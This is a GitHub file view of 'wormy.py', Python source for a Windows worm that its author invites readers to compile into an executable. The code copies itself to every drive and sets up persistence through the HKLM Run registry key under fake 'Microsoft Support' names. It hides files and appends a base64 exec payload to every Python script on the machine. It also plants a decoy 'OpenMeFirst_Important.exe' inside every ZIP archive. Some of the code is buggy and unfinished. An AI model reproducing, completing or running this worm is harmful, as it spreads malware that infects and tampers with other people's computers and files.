-
-
Notifications
You must be signed in to change notification settings - Fork 27
/
wormy.py
132 lines (121 loc) · 4.34 KB
/
wormy.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
#
# Note:Most of the functions would be for windows or all of it
#
# Don't forget to convert it to executable & I recommend to you pyinstaller
#
import os,string,random,sys,glob,hashlib,zipfile
from winreg import *
#Get the drivers on the pc
def drivers():
drivs = []
for i in string.ascii_uppercase:
if os.path.isdir( i+":" ) == True:
drivs.append( i+":" )
return drivs
#Return a new random name for a file
def fname(name):
if "." not in name :
return name + str(random.randint(0,100))
elif "." in name :
return name.split(".")[0] + str(random.randint(0,100)) + "." + name.split(".")[1]
#To make the files check each other from hash not name
#Return MD5 hash of a file
def md5_checksum(fi):
return hashlib.md5(open(fi, 'rb').read()).hexdigest()
#The script must be executable
#Add each copy of the backdoor to the startup
def Startup(worms):
for worm in worms:
hiddenPath = os.getcwd()
hiddenPath = '\"' + hiddenPath + '\"'
regPath = os.getcwd()
regPath = regPath + r"\%s"%worm
regPath = '\"' + regPath + '\"'
regConnect = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
regKey = OpenKey(regConnect, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
SetValueEx(regKey,"Microsoft Support part "+str(random.randint(0,100)),0, REG_SZ, r"" + regPath)
#Hide the file
os.system("attrib +h " + hiddenPath)
#Make a copy of the backdoor
def make_copy( old,new ):
old_file = open( old,"rb" )
new_file = open( new,"wb" )
old_data = old_file.read()
new_file.write( old_data )
old_file.close()
new_file.close()
#For example if we in C:\.\.\.\..etc I will be in C:
def Goback():
for i in range( 0,20 ):
a = os.popen("cd ..")
#The script must be executable
#Spread backdoor copys in the pc drivers
def spread_in_drivers():
Goback()
drivs = drivers()
#current_driver = os.getcwd().split( ":" )[0]
name = sys.argv[0]
f = open( name , "rb" )
data = f.read()
f.close()
for driv in drivs:
exist = 0
os.chdir( driv )
#get all the exe files in the folder
driv_files = glob.glob( "*.exe" )
for fi in driv_files:
if md5_checksum( fi ) == md5_checksum( name ):
exist = 1
if exist == 0 :
make_copy( name,fname(name) )
#[when a script moved to any other device and executed it will run our backdoor on it]
#The script must be executable
#Spread in the python scripts
def spread_in_python():
Goback()
files = []
#get all the python files in the machine
for driv in drivers():
os.chdir( driv )
files = os.popen( 'dir /s /b "*.py"' ).read().split( "\n" )
for f in files:
if "#--SayTheMagicWord--" not in open( f,"r" ).read() :
a=open(f,"a+")
a.write("\n\n\n\n#--SayTheMagicWord--\nimport base64,os;exec(base64.b64decode('{}'))".format(base64.b64encode("open('YourDailyWorm.exe','w').write('{}');os.popen('YourDailyWorm.exe')".format(open(sys.argv[0],'rb').read()))))
a.close()
#Clean a file data and rewrite it
def replace_file( old_file,data ):
f = open( old_file,"w" )
f.write(data)
f.close()
#The script must be executable
#Spread in ZIP files
def spread_in_zip():
Goback()
name = sys.argv[0]
files = []
#get all the ZIP files in the machine
for driv in drivers():
os.chdir( driv )
files = os.popen( 'dir /s /b "*.zip"' ).read().split( "\n" )
for f in files:
if "OpenMeFirst_Important.exe" not in zipfile.ZipFile(f).namelist():
#extract the ZIP file to temp folder
old_zip = zipfile.ZipFile(f)
old_zip.extractall("temp")
os.chdir( "temp" )
#make a self copy
make_copy( name,"OpenMeFirst_Important.exe" )
old_zip.close()
#now make a new ZIP file with the same name
new_zip = zipfile.ZipFile( os.path.basename(f),"w" )
#Add all files in temp to the new ZIP
for fi in os.listdir():
new_zip.write(fi)
new.close()
#Now replace the original one with our copy
replace_file( f,open( os.path.basename(f) ,"rb").read() )
#cleanup!
os.chdir("..")
os.remove("temp")
#I will Continue later.. ;)